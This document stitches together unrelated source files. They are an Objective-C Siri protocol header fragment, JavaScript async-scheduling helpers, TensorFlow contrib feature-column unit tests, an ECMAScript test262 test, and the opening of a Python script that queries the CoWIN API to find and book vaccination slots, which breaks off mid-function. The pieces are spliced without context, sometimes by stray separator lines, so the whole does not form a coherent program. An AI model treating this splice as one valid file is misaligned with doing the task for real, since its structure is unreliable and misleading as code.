-(id)navigationTitle;
-(double)desiredHeightForWidth:(double)arg1;
-(double)desiredHeight;
// Editing / scrolling / speech lifecycle callbacks.
-(void)endEditingAndCorrect:(BOOL)arg1;
-(void)endEditingAndCorrectByTouchPoint:(CGPoint)arg1;
-(void)handleAceCommand:(id)arg1;
-(void)siriWillBeginScrolling;
-(void)siriDidScrollVisible:(BOOL)arg1;
-(double)desiredTopPaddingBelowController:(id)arg1;
-(double)desiredPinnedTopPadding;
-(void)siriDidStartSpeakingWithIdentifier:(id)arg1;
-(void)siriDidStopSpeakingWithIdentifier:(id)arg1 speechQueueIsEmpty:(BOOL)arg2;
-(BOOL)shouldHidePriorViews;
-(void)siriDidReceiveViewsWithDialogPhase:(id)arg1;

@required
// Accessors backing the properties above, plus mandatory lifecycle hooks.
-(AceObject *)aceObject;
-(void)setAceObject:(id)arg1;
-(void)siriWillActivateFromSource:(long long)arg1;
-(void)siriDidDeactivate;
-(void)wasAddedToTranscript;
-(BOOL)isUtteranceUserInteractionEnabled;
-(void)setUtteranceUserInteractionEnabled:(BOOL)arg1;
@end
import "./boot.js";

// --- microtask machinery -------------------------------------------------
// Callbacks are queued and flushed from a MutationObserver on a detached
// text node; mutating the node's textContent schedules a microtask flush.
let microtaskCurrHandle = 0;
let microtaskLastHandle = 0;
const microtaskCallbacks = [];
let microtaskNodeContent = 0;
const microtaskNode = document.createTextNode("");
new window.MutationObserver(microtaskFlush).observe(microtaskNode, {
  characterData: true
});

function microtaskFlush() {
  const len = microtaskCallbacks.length;
  for (let i = 0; i < len; i++) {
    const cb = microtaskCallbacks[i];
    if (cb) {
      try {
        cb();
      } catch (err) {
        // Re-throw asynchronously so one failing callback cannot stop the
        // remaining callbacks from running.
        setTimeout(() => {
          throw err;
        });
      }
    }
  }
  microtaskCallbacks.splice(0, len);
  microtaskLastHandle += len;
}

// Async interface wrapping setTimeout; `after(delay)` pre-binds the delay.
const timeOut = {
  after(delay) {
    return {
      run(fn) {
        return window.setTimeout(fn, delay);
      },
      cancel(handle) {
        window.clearTimeout(handle);
      }
    };
  },
  run(fn, delay) {
    return window.setTimeout(fn, delay);
  },
  cancel(handle) {
    window.clearTimeout(handle);
  }
};
export { timeOut };

// Async interface wrapping requestAnimationFrame.
const animationFrame = {
  run(fn) {
    return window.requestAnimationFrame(fn);
  },
  cancel(handle) {
    window.cancelAnimationFrame(handle);
  }
};
export { animationFrame };

// Async interface wrapping requestIdleCallback, with a 16ms setTimeout
// fallback where it is unavailable.
const idlePeriod = {
  run(fn) {
    return window.requestIdleCallback
      ? window.requestIdleCallback(fn)
      : window.setTimeout(fn, 16);
  },
  cancel(handle) {
    window.cancelIdleCallback
      ? window.cancelIdleCallback(handle)
      : window.clearTimeout(handle);
  }
};
export { idlePeriod };

// Async interface that enqueues on the microtask queue above.
const microTask = {
  run(callback) {
    // Touching textContent triggers the MutationObserver -> flush.
    microtaskNode.textContent = microtaskNodeContent++;
    microtaskCallbacks.push(callback);
    return microtaskCurrHandle++;
  },
  cancel(handle) {
    const idx = handle - microtaskLastHandle;
    if (idx >= 0) {
      if (!microtaskCallbacks[idx]) {
        throw new Error("invalid async handle: " + handle);
      }
      // Null out instead of removing so other handles keep their offsets.
      microtaskCallbacks[idx] = null;
    }
  }
};
export { microTask };
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.feature_column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
class FeatureColumnTest(tf.test.TestCase):
  """Tests for tf.contrib.layers feature-column constructors.

  Covers column naming, dtype validation, default-value normalization,
  feature-spec generation, placeholder creation, and checkpoint-initialized
  embedding / crossed-column weights.
  """

  def testImmutability(self):
    a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
                                                         hash_bucket_size=100)
    with self.assertRaises(AttributeError):
      a.column_name = "bbb"

  def testSparseColumn(self):
    a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
                                                         hash_bucket_size=100)
    self.assertEqual(a.name, "aaa")

  def testWeightedSparseColumn(self):
    ids = tf.contrib.layers.sparse_column_with_keys(
        "ids", ["marlo", "omar", "stringer"])
    weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
    self.assertEqual(weighted_ids.name, "ids_weighted_by_weights")

  def testEmbeddingColumn(self):
    a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
                                                         hash_bucket_size=100,
                                                         combiner="sum")
    b = tf.contrib.layers.embedding_column(a, dimension=4, combiner="mean")
    self.assertEqual(b.sparse_id_column.name, "aaa")
    self.assertEqual(b.dimension, 4)
    self.assertEqual(b.combiner, "mean")

  def testRealValuedColumn(self):
    a = tf.contrib.layers.real_valued_column("aaa")
    self.assertEqual(a.name, "aaa")
    self.assertEqual(a.dimension, 1)
    b = tf.contrib.layers.real_valued_column("bbb", 10)
    self.assertEqual(b.dimension, 10)
    self.assertTrue(b.default_value is None)
    with self.assertRaisesRegexp(TypeError, "dimension must be an integer"):
      tf.contrib.layers.real_valued_column("d3", dimension=1.0)
    with self.assertRaisesRegexp(ValueError,
                                 "dimension must be greater than 0"):
      tf.contrib.layers.real_valued_column("d3", dimension=0)
    with self.assertRaisesRegexp(ValueError,
                                 "dtype must be convertible to float"):
      tf.contrib.layers.real_valued_column("d3", dtype=tf.string)
    # default_value is an integer.
    c1 = tf.contrib.layers.real_valued_column("c1", default_value=2)
    self.assertListEqual(list(c1.default_value), [2.])
    c2 = tf.contrib.layers.real_valued_column("c2",
                                              default_value=2,
                                              dtype=tf.int32)
    self.assertListEqual(list(c2.default_value), [2])
    c3 = tf.contrib.layers.real_valued_column("c3",
                                              dimension=4,
                                              default_value=2)
    self.assertListEqual(list(c3.default_value), [2, 2, 2, 2])
    c4 = tf.contrib.layers.real_valued_column("c4",
                                              dimension=4,
                                              default_value=2,
                                              dtype=tf.int32)
    self.assertListEqual(list(c4.default_value), [2, 2, 2, 2])
    # default_value is a float.
    d1 = tf.contrib.layers.real_valued_column("d1", default_value=2.)
    self.assertListEqual(list(d1.default_value), [2.])
    d2 = tf.contrib.layers.real_valued_column("d2",
                                              dimension=4,
                                              default_value=2.)
    self.assertListEqual(list(d2.default_value), [2., 2., 2., 2.])
    with self.assertRaisesRegexp(TypeError,
                                 "default_value must be compatible with dtype"):
      tf.contrib.layers.real_valued_column("d3",
                                           default_value=2.,
                                           dtype=tf.int32)
    # default_value is neither integer nor float.
    with self.assertRaisesRegexp(
        TypeError, "default_value must be compatible with dtype"):
      tf.contrib.layers.real_valued_column("e1", default_value="string")
    with self.assertRaisesRegexp(
        TypeError, "default_value must be compatible with dtype"):
      tf.contrib.layers.real_valued_column("e1",
                                           dimension=3,
                                           default_value=[1, 3., "string"])
    # default_value is a list of integers.
    f1 = tf.contrib.layers.real_valued_column("f1", default_value=[2])
    self.assertListEqual(list(f1.default_value), [2])
    f2 = tf.contrib.layers.real_valued_column("f2",
                                              dimension=3,
                                              default_value=[2, 2, 2])
    self.assertListEqual(list(f2.default_value), [2., 2., 2.])
    f3 = tf.contrib.layers.real_valued_column("f3",
                                              dimension=3,
                                              default_value=[2, 2, 2],
                                              dtype=tf.int32)
    self.assertListEqual(list(f3.default_value), [2, 2, 2])
    # default_value is a list of floats.
    g1 = tf.contrib.layers.real_valued_column("g1", default_value=[2.])
    self.assertListEqual(list(g1.default_value), [2.])
    g2 = tf.contrib.layers.real_valued_column("g2",
                                              dimension=3,
                                              default_value=[2., 2, 2])
    self.assertListEqual(list(g2.default_value), [2., 2., 2.])
    with self.assertRaisesRegexp(
        TypeError, "default_value must be compatible with dtype"):
      tf.contrib.layers.real_valued_column("g3",
                                           default_value=[2.],
                                           dtype=tf.int32)
    with self.assertRaisesRegexp(
        ValueError, "The length of default_value must be equal to dimension"):
      tf.contrib.layers.real_valued_column("g4",
                                           dimension=3,
                                           default_value=[2.])
    # Test that the normalizer_fn gets stored for a real_valued_column
    normalizer = lambda x: x - 1
    h1 = tf.contrib.layers.real_valued_column("h1", normalizer=normalizer)
    self.assertEqual(normalizer(10), h1.normalizer_fn(10))

  def testBucketizedColumnNameEndsWithUnderscoreBucketized(self):
    a = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("aaa"), [0, 4])
    self.assertEqual(a.name, "aaa_bucketized")

  def testBucketizedColumnRequiresRealValuedColumn(self):
    with self.assertRaisesRegexp(
        TypeError, "source_column must be an instance of _RealValuedColumn"):
      tf.contrib.layers.bucketized_column("bbb", [0])
    with self.assertRaisesRegexp(
        TypeError, "source_column must be an instance of _RealValuedColumn"):
      tf.contrib.layers.bucketized_column(
          tf.contrib.layers.sparse_column_with_integerized_feature(
              column_name="bbb", bucket_size=10),
          [0])

  def testBucketizedColumnRequiresSortedBuckets(self):
    with self.assertRaisesRegexp(
        ValueError, "boundaries must be a sorted list"):
      tf.contrib.layers.bucketized_column(
          tf.contrib.layers.real_valued_column("ccc"), [5, 0, 4])

  def testBucketizedColumnWithSameBucketBoundaries(self):
    # Duplicate boundaries are de-duplicated in the resulting column.
    a_bucketized = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("a"), [1., 2., 2., 3., 3.])
    self.assertEqual(a_bucketized.name, "a_bucketized")
    self.assertTupleEqual(a_bucketized.boundaries, (1., 2., 3.))

  def testCrossedColumnNameCreatesSortedNames(self):
    a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
                                                         hash_bucket_size=100)
    b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
                                                         hash_bucket_size=100)
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("cost"), [0, 4])
    crossed = tf.contrib.layers.crossed_column(
        set([b, bucket, a]), hash_bucket_size=10000)
    self.assertEqual("aaa_X_bbb_X_cost_bucketized", crossed.name,
                     "name should be generated by sorted column names")
    self.assertEqual("aaa", crossed.columns[0].name)
    self.assertEqual("bbb", crossed.columns[1].name)
    self.assertEqual("cost_bucketized", crossed.columns[2].name)

  def testCrossedColumnNotSupportRealValuedColumn(self):
    b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
                                                         hash_bucket_size=100)
    with self.assertRaisesRegexp(
        TypeError,
        "columns must be a set of _SparseColumn, _CrossedColumn, "
        "or _BucketizedColumn instances"):
      tf.contrib.layers.crossed_column(
          set([b, tf.contrib.layers.real_valued_column("real")]),
          hash_bucket_size=10000)

  def testWeightedSparseColumnDtypes(self):
    ids = tf.contrib.layers.sparse_column_with_keys(
        "ids", ["marlo", "omar", "stringer"])
    weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
    self.assertDictEqual(
        {"ids": tf.VarLenFeature(tf.string),
         "weights": tf.VarLenFeature(tf.float32)},
        weighted_ids.config)
    weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights",
                                                            dtype=tf.int32)
    self.assertDictEqual(
        {"ids": tf.VarLenFeature(tf.string),
         "weights": tf.VarLenFeature(tf.int32)},
        weighted_ids.config)
    with self.assertRaisesRegexp(ValueError,
                                 "dtype is not convertible to float"):
      weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights",
                                                              dtype=tf.string)

  def testRealValuedColumnDtypes(self):
    rvc = tf.contrib.layers.real_valued_column("rvc")
    self.assertDictEqual(
        {"rvc": tf.FixedLenFeature(
            [1], dtype=tf.float32)},
        rvc.config)
    rvc = tf.contrib.layers.real_valued_column("rvc", dtype=tf.int32)
    self.assertDictEqual(
        {"rvc": tf.FixedLenFeature(
            [1], dtype=tf.int32)},
        rvc.config)
    with self.assertRaisesRegexp(ValueError,
                                 "dtype must be convertible to float"):
      tf.contrib.layers.real_valued_column("rvc", dtype=tf.string)

  def testSparseColumnDtypes(self):
    sc = tf.contrib.layers.sparse_column_with_integerized_feature("sc", 10)
    self.assertDictEqual({"sc": tf.VarLenFeature(dtype=tf.int64)}, sc.config)
    sc = tf.contrib.layers.sparse_column_with_integerized_feature(
        "sc", 10, dtype=tf.int32)
    self.assertDictEqual({"sc": tf.VarLenFeature(dtype=tf.int32)}, sc.config)
    with self.assertRaisesRegexp(ValueError,
                                 "dtype must be an integer"):
      tf.contrib.layers.sparse_column_with_integerized_feature("sc",
                                                               10,
                                                               dtype=tf.float32)

  def testCreateFeatureSpec(self):
    # One column of each flavor; the parsing spec must reflect the base
    # (source) features, not the derived columns.
    sparse_col = tf.contrib.layers.sparse_column_with_hash_bucket(
        "sparse_column", hash_bucket_size=100)
    embedding_col = tf.contrib.layers.embedding_column(
        tf.contrib.layers.sparse_column_with_hash_bucket(
            "sparse_column_for_embedding",
            hash_bucket_size=10),
        dimension=4)
    sparse_id_col = tf.contrib.layers.sparse_column_with_keys(
        "id_column", ["marlo", "omar", "stringer"])
    weighted_id_col = tf.contrib.layers.weighted_sparse_column(
        sparse_id_col, "id_weights_column")
    real_valued_col1 = tf.contrib.layers.real_valued_column(
        "real_valued_column1")
    real_valued_col2 = tf.contrib.layers.real_valued_column(
        "real_valued_column2", 5)
    bucketized_col1 = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column(
            "real_valued_column_for_bucketization1"), [0, 4])
    bucketized_col2 = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column(
            "real_valued_column_for_bucketization2", 4), [0, 4])
    a = tf.contrib.layers.sparse_column_with_hash_bucket("cross_aaa",
                                                         hash_bucket_size=100)
    b = tf.contrib.layers.sparse_column_with_hash_bucket("cross_bbb",
                                                         hash_bucket_size=100)
    cross_col = tf.contrib.layers.crossed_column(
        set([a, b]), hash_bucket_size=10000)
    feature_columns = set([sparse_col, embedding_col, weighted_id_col,
                           real_valued_col1, real_valued_col2,
                           bucketized_col1, bucketized_col2,
                           cross_col])
    config = tf.contrib.layers.create_feature_spec_for_parsing(feature_columns)
    self.assertDictEqual({
        "sparse_column": tf.VarLenFeature(tf.string),
        "sparse_column_for_embedding": tf.VarLenFeature(tf.string),
        "id_column": tf.VarLenFeature(tf.string),
        "id_weights_column": tf.VarLenFeature(tf.float32),
        "real_valued_column1": tf.FixedLenFeature([1], dtype=tf.float32),
        "real_valued_column2": tf.FixedLenFeature([5], dtype=tf.float32),
        "real_valued_column_for_bucketization1":
            tf.FixedLenFeature([1], dtype=tf.float32),
        "real_valued_column_for_bucketization2":
            tf.FixedLenFeature([4], dtype=tf.float32),
        "cross_aaa": tf.VarLenFeature(tf.string),
        "cross_bbb": tf.VarLenFeature(tf.string)}, config)

  def testCreateFeatureSpec_RealValuedColumnWithDefaultValue(self):
    real_valued_col1 = tf.contrib.layers.real_valued_column(
        "real_valued_column1", default_value=2)
    real_valued_col2 = tf.contrib.layers.real_valued_column(
        "real_valued_column2", 5, default_value=4)
    real_valued_col3 = tf.contrib.layers.real_valued_column(
        "real_valued_column3", default_value=[8])
    real_valued_col4 = tf.contrib.layers.real_valued_column(
        "real_valued_column4", 3,
        default_value=[1, 0, 6])
    feature_columns = [real_valued_col1, real_valued_col2,
                       real_valued_col3, real_valued_col4]
    config = tf.contrib.layers.create_feature_spec_for_parsing(feature_columns)
    self.assertEqual(4, len(config))
    self.assertDictEqual({
        "real_valued_column1":
            tf.FixedLenFeature([1], dtype=tf.float32, default_value=[2.]),
        "real_valued_column2":
            tf.FixedLenFeature([5], dtype=tf.float32,
                               default_value=[4., 4., 4., 4., 4.]),
        "real_valued_column3":
            tf.FixedLenFeature([1], dtype=tf.float32, default_value=[8.]),
        "real_valued_column4":
            tf.FixedLenFeature([3], dtype=tf.float32,
                               default_value=[1., 0., 6.])}, config)

  def testMakePlaceHolderTensorsForBaseFeatures(self):
    sparse_col = tf.contrib.layers.sparse_column_with_hash_bucket(
        "sparse_column", hash_bucket_size=100)
    real_valued_col = tf.contrib.layers.real_valued_column("real_valued_column",
                                                           5)
    bucketized_col = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column(
            "real_valued_column_for_bucketization"), [0, 4])
    feature_columns = set([sparse_col, real_valued_col, bucketized_col])
    placeholders = (
        tf.contrib.layers.make_place_holder_tensors_for_base_features(
            feature_columns))
    self.assertEqual(3, len(placeholders))
    self.assertTrue(isinstance(placeholders["sparse_column"],
                               tf.SparseTensor))
    placeholder = placeholders["real_valued_column"]
    self.assertGreaterEqual(
        placeholder.name.find(u"Placeholder_real_valued_column"), 0)
    self.assertEqual(tf.float32, placeholder.dtype)
    self.assertEqual([None, 5], placeholder.get_shape().as_list())
    placeholder = placeholders["real_valued_column_for_bucketization"]
    self.assertGreaterEqual(
        placeholder.name.find(
            u"Placeholder_real_valued_column_for_bucketization"), 0)
    self.assertEqual(tf.float32, placeholder.dtype)
    self.assertEqual([None, 1], placeholder.get_shape().as_list())

  def testInitEmbeddingColumnWeightsFromCkpt(self):
    sparse_col = tf.contrib.layers.sparse_column_with_hash_bucket(
        column_name="object_in_image",
        hash_bucket_size=4)
    # Create _EmbeddingColumn which randomly initializes embedding of size
    # [4, 16].
    embedding_col = tf.contrib.layers.embedding_column(sparse_col, dimension=16)
    # Creating a SparseTensor which has all the ids possible for the given
    # vocab.
    input_tensor = tf.SparseTensor(indices=[[0, 0], [1, 1], [2, 2], [3, 3]],
                                   values=[0, 1, 2, 3],
                                   shape=[4, 4])
    # Invoking 'embedding_column.to_dnn_input_layer' will create the embedding
    # variable. Creating under scope 'run_1' so as to prevent name conflicts
    # when creating embedding variable for 'embedding_column_pretrained'.
    with tf.variable_scope("run_1"):
      with tf.variable_scope(embedding_col.name):
        # This will return a [4, 16] tensor which is same as embedding variable.
        embeddings = embedding_col.to_dnn_input_layer(input_tensor)
    save = tf.train.Saver()
    checkpoint_path = os.path.join(self.get_temp_dir(), "model.ckpt")
    with self.test_session() as sess:
      sess.run(tf.initialize_all_variables())
      saved_embedding = embeddings.eval()
      save.save(sess, checkpoint_path)
    embedding_col_initialized = tf.contrib.layers.embedding_column(
        sparse_id_column=sparse_col,
        dimension=16,
        ckpt_to_load_from=checkpoint_path,
        tensor_name_in_ckpt="run_1/object_in_image_embedding/weights")
    with tf.variable_scope("run_2"):
      # This will initialize the embedding from provided checkpoint and return a
      # [4, 16] tensor which is same as embedding variable. Since we didn't
      # modify embeddings, this should be same as 'saved_embedding'.
      pretrained_embeddings = embedding_col_initialized.to_dnn_input_layer(
          input_tensor)
    with self.test_session() as sess:
      sess.run(tf.initialize_all_variables())
      loaded_embedding = pretrained_embeddings.eval()
    self.assertAllClose(saved_embedding, loaded_embedding)

  def testInitCrossedColumnWeightsFromCkpt(self):
    sparse_col_1 = tf.contrib.layers.sparse_column_with_hash_bucket(
        column_name="col_1", hash_bucket_size=4)
    sparse_col_2 = tf.contrib.layers.sparse_column_with_hash_bucket(
        column_name="col_2", hash_bucket_size=4)
    crossed_col = tf.contrib.layers.crossed_column(
        columns=[sparse_col_1, sparse_col_2],
        hash_bucket_size=4)
    input_tensor = tf.SparseTensor(indices=[[0, 0], [1, 1], [2, 2], [3, 3]],
                                   values=[0, 1, 2, 3],
                                   shape=[4, 4])
    # Invoking 'crossed_col.to_weighted_sum' will create the crossed column
    # weights variable.
    with tf.variable_scope("run_1"):
      with tf.variable_scope(crossed_col.name):
        # Returns looked up column weights which is same as crossed column
        # weights as well as actual references to weights variables.
        col_weights, weights = crossed_col.to_weighted_sum(input_tensor)
        # Update the weights since default initializer initializes all weights
        # to 0.0.
        # NOTE(review): only the assign_op from the LAST loop iteration is
        # run below -- presumably `weights` has a single element here; verify.
        for weight in weights:
          assign_op = tf.assign(weight, weight + 0.5)
    save = tf.train.Saver()
    checkpoint_path = os.path.join(self.get_temp_dir(), "model.ckpt")
    with self.test_session() as sess:
      sess.run(tf.initialize_all_variables())
      sess.run(assign_op)
      saved_col_weights = col_weights.eval()
      save.save(sess, checkpoint_path)
    crossed_col_initialized = tf.contrib.layers.crossed_column(
        columns=[sparse_col_1, sparse_col_2],
        hash_bucket_size=4,
        ckpt_to_load_from=checkpoint_path,
        tensor_name_in_ckpt="run_1/col_1_X_col_2/weights")
    with tf.variable_scope("run_2"):
      # This will initialize the crossed column weights from provided checkpoint
      # and return a [4, 1] tensor which is same as weights variable. Since we
      # won't modify weights, this should be same as 'saved_col_weights'.
      col_weights_from_ckpt, _ = crossed_col_initialized.to_weighted_sum(
          input_tensor)
    with self.test_session() as sess:
      sess.run(tf.initialize_all_variables())
      loaded_col_weights = col_weights_from_ckpt.eval()
    self.assertAllClose(saved_col_weights, loaded_col_weights)
# Run all FeatureColumnTest cases when executed directly.
if __name__ == "__main__":
  tf.test.main()
|
// Copyright (c) 2012 Ecma International. All rights reserved.
// Ecma International makes this code available under the terms and conditions set
// forth on http://hg.ecmascript.org/tests/test262/raw-file/tip/LICENSE (the
// "Use Terms"). Any redistribution of this code must retain the above
// copyright and this notice and otherwise comply with the Use Terms.
/*---
es5id: 15.2.3.7-6-a-245
description: >
Object.defineProperties - TypeError is thrown if 'O' is an Array,
'P' is an array index named property that already exists on 'O' is
accessor property with [[Configurable]] false, 'desc' is accessor
descriptor, the [[Get]] field of 'desc' is present, and the
[[Get]] field of 'desc' is an object and the [[Get]] attribute
value of 'P' is undefined (15.4.5.1 step 4.c)
includes: [propertyHelper.js]
---*/
var arr = [];

// Accessor for the pre-existing index "1"; its return value is what the
// property must still yield after the failed redefinition below.
function get_fun() {
    return 36;
}

// [[Configurable]] defaults to false here, which is what makes the later
// redefinition illegal (see the es5id description above).
Object.defineProperty(arr, "1", {
    get: get_fun
});

try {
    // Attempt to change [[Get]] on a non-configurable accessor property;
    // per ES5.1 8.12.9 / 15.4.5.1 this must throw a TypeError.
    Object.defineProperties(arr, {
        "1": {
            get: undefined
        }
    });
    $ERROR("Expected an exception.");
} catch (e) {
    // The property must be completely unchanged by the failed attempt.
    verifyEqualTo(arr, "1", get_fun());
    verifyNotEnumerable(arr, "1");
    verifyNotConfigurable(arr, "1");
    if (!(e instanceof TypeError)) {
        $ERROR("Expected TypeError, got " + e);
    }
}
|
import json
import pandas as pd
import re
import sqlite3
from collections import Counter
from hashlib import sha256
from pathlib import Path
import copy
import datetime
import random
import requests
import sys
import tabulate
import time
from inputimeout import inputimeout, TimeoutOccurred
from captcha import captcha_builder
# CoWIN public API endpoints.  The calendar URLs are str.format templates:
# {0} = district_id / pincode, {1} = start date (DD-MM-YYYY).
BOOKING_URL = "https://cdn-api.co-vin.in/api/v2/appointment/schedule"
BENEFICIARIES_URL = "https://cdn-api.co-vin.in/api/v2/appointment/beneficiaries"
CALENDAR_URL_DISTRICT = "https://cdn-api.co-vin.in/api/v2/appointment/sessions/calendarByDistrict?district_id={0}&date={1}"
CALENDAR_URL_PINCODE = "https://cdn-api.co-vin.in/api/v2/appointment/sessions/calendarByPin?pincode={0}&date={1}"
CAPTCHA_URL = "https://cdn-api.co-vin.in/api/v2/auth/getRecaptcha"
OTP_PUBLIC_URL = 'https://cdn-api.co-vin.in/api/v2/auth/public/generateOTP'
OTP_PRO_URL = 'https://cdn-api.co-vin.in/api/v2/auth/generateMobileOTP'
# (frequency_hz, duration_ms) used for the audible warning on errors.
WARNING_BEEP_DURATION = (1000, 2000)
# Platform beep support: winsound on Windows, otherwise shell out to
# `play` (SoX) on macOS or `beep` on other Unixes.
#
# Fix: `os` was previously imported only inside the ImportError branch, so on
# Windows (where winsound imports fine) later calls such as
# os.system("pause") in confirm_and_proceed() raised NameError.
import os

try:
    import winsound
except ImportError:
    if sys.platform == "darwin":
        def beep(freq, duration):
            # brew install SoX --> install SOund eXchange universal sound sample translator on mac
            os.system(
                f"play -n synth {duration/1000} sin {freq} >/dev/null 2>&1")
    else:
        def beep(freq, duration):
            # apt-get install beep --> install beep package on linux distros before running
            os.system('beep -f %s -l %s' % (freq, duration))
else:
    def beep(freq, duration):
        winsound.Beep(freq, duration)
def viable_options(resp, minimum_slots, min_age_booking, fee_type, dose):
    """Filter a CoWIN calendar API response down to bookable sessions.

    :param resp: decoded JSON response containing a 'centers' list
    :param minimum_slots: minimum available capacity for the requested dose
    :param min_age_booking: session min_age_limit must not exceed this
    :param fee_type: iterable of acceptable fee types (e.g. ['Free', 'Paid'])
    :param dose: 1 or 2 -- selects which dose capacity field to check
    :return: list of dicts describing each viable center/session

    Cleanup: the original guarded the loop with the tautological
    ``len(resp['centers']) >= 0`` and carried dead ``else: pass`` branches.
    """
    options = []
    for center in resp.get('centers', []):
        for session in center['sessions']:
            # Capacity is tracked per dose by the API.
            key = 'available_capacity_dose1' if dose == 1 else 'available_capacity_dose2'
            availability = session[key]
            if (availability >= minimum_slots
                    and session['min_age_limit'] <= min_age_booking
                    and center['fee_type'] in fee_type):
                options.append({
                    'name': center['name'],
                    'district': center['district_name'],
                    'pincode': center['pincode'],
                    'center_id': center['center_id'],
                    'available': availability,
                    'date': session['date'],
                    'slots': session['slots'],
                    'session_id': session['session_id']
                })
    return options
def display_table(dict_list):
    """
    This function
    1. Takes a list of dictionary
    2. Add an Index column, and
    3. Displays the data in tabular format
    """
    header = ['idx'] + list(dict_list[0].keys())
    rows = []
    for position, entry in enumerate(dict_list, start=1):
        rows.append([position] + list(entry.values()))
    print(tabulate.tabulate(rows, header, tablefmt='grid'))
def display_info_dict(details):
    """Pretty-print a details dict: lists of dicts become tables, everything
    else is printed as ``key : value``.

    Fixes: the original duplicated the fallback print in two separate else
    branches, and crashed with IndexError on an empty list (display_table
    indexes ``dict_list[0]``).
    """
    for key, value in details.items():
        if isinstance(value, list) and value and all(isinstance(item, dict) for item in value):
            # Non-empty list of dicts -> render as a table.
            print(f"\t{key}:")
            display_table(value)
        else:
            print(f"\t{key}\t: {value}")
def confirm_and_proceed(collected_details):
    """Display the collected details and ask the user to confirm.

    Exits the process (after a Windows-style "pause") when the user answers
    anything other than 'y'; an empty answer defaults to 'y'.
    """
    # Local import: the module-level `os` import historically only happened in
    # the winsound ImportError fallback, so this would NameError on Windows.
    import os
    print("\n================================= Confirm Info =================================\n")
    display_info_dict(collected_details)
    confirm = input("\nProceed with above info (y/n Default y) : ")
    confirm = confirm if confirm else 'y'
    if confirm != 'y':
        print("Details not confirmed. Exiting process.")
        os.system("pause")  # NOTE: "pause" is a Windows shell builtin; a no-op failure elsewhere
        sys.exit()
def save_user_info(filename, details):
    """Optionally persist the collected details to ``filename`` as JSON.

    Prompts the user (default 'y'); on confirmation dumps ``details`` and
    reports where the file was written.

    Fix: the confirmation message had lost its filename placeholder
    (it printed the literal text "(unknown)"); restored ``{filename}``.
    """
    # Local import: module-level `os` may be missing on Windows (it was only
    # imported in the winsound ImportError fallback).
    import os
    print("\n================================= Save Info =================================\n")
    save_info = input("Would you like to save this as a JSON file for easy use next time?: (y/n Default y): ")
    save_info = save_info if save_info else 'y'
    if save_info == 'y':
        with open(filename, 'w') as f:
            json.dump(details, f)
        print(f"Info saved to {filename} in {os.getcwd()}")
def get_saved_user_info(filename):
    """Load previously saved user details from a JSON file and return them."""
    with open(filename) as f:
        return json.load(f)
def collect_user_details(request_header):
    """Interactively collect beneficiary, location and scheduling preferences.

    :param request_header: dict of HTTP headers (incl. auth token) for API calls
    :return: dict with keys beneficiary_dtls, location_dtls, search_option,
             minimum_slots, refresh_freq, auto_book, start_date, vaccine_type,
             fee_type
    """
    # Get Beneficiaries
    print("Fetching registered beneficiaries.. ")
    beneficiary_dtls = get_beneficiaries(request_header)
    if len(beneficiary_dtls) == 0:
        print("There should be at least one beneficiary. Exiting.")
        os.system("pause")
        sys.exit(1)
    # Make sure all beneficiaries have the same type of vaccine
    vaccine_types = [beneficiary['vaccine'] for beneficiary in beneficiary_dtls]
    statuses = [beneficiary['status'] for beneficiary in beneficiary_dtls]
    # All beneficiaries in one attempt must be on the same dose.
    if len(set(statuses)) > 1:
        print("\n================================= Important =================================\n")
        print(f"All beneficiaries in one attempt should be of same vaccination status (same dose). Found {statuses}")
        os.system("pause")
        sys.exit(1)
    vaccines = set(vaccine_types)
    if len(vaccines) > 1 and ('' in vaccines):
        # Mixed preferences: some beneficiaries have a vaccine set, some don't.
        # NOTE(review): list.remove('') drops only the FIRST empty entry, so
        # vaccine_types[0] below can still be '' when several entries were
        # empty -- confirm intended behavior.
        vaccines.remove('')
        vaccine_types.remove('')
        print("\n================================= Important =================================\n")
        print(f"Some of the beneficiaries have a set vaccine preference ({vaccines}) and some do not.")
        print("Results will be filtered to show only the set vaccine preference.")
        os.system("pause")
    if len(vaccines) != 1:
        print("\n================================= Important =================================\n")
        print(f"All beneficiaries in one attempt should have the same vaccine type. Found {len(vaccines)}")
        os.system("pause")
        sys.exit(1)
    vaccine_type = vaccine_types[0]
    if not vaccine_type:
        # No account-level preference: ask the user directly.
        print("\n================================= Vaccine Info =================================\n")
        vaccine_type = get_vaccine_preference()
    print("\n================================= Location Info =================================\n")
    # get search method to use
    search_option = input(
        """Search by Pincode? Or by State/District? \nEnter 1 for Pincode or 2 for State/District. (Default 2) : """)
    if not search_option or int(search_option) not in [1, 2]:
        search_option = 2
    else:
        search_option = int(search_option)
    if search_option == 2:
        # Collect vaccination center preferance
        location_dtls = get_districts(request_header)
    else:
        # Collect vaccination center preferance
        location_dtls = get_pincodes()
    print("\n================================= Additional Info =================================\n")
    # Set filter condition
    minimum_slots = input(f'Filter out centers with availability less than ? Minimum {len(beneficiary_dtls)} : ')
    if minimum_slots:
        # Never filter below the number of beneficiaries being booked.
